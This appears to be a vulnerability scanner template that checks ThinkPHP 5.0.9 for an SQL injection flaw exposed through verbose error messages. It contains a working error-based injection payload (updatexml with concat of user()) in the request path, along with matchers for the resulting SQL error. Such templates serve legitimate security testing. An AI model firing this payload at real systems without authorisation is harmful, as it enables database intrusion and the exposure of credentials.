id: thinkphp-509-information-disclosure info: name: ThinkPHP 5.0.9 Information Disclosure author: dr_set severity: critical description: Verbose SQL error message reveals sensitive information including database credentials. reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection tags: thinkphp requests: - method: GET path: - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1" matchers-condition: and matchers: - type: word condition: and words: - "SQLSTATE" - "XPATH syntax error" - type: status status: - 500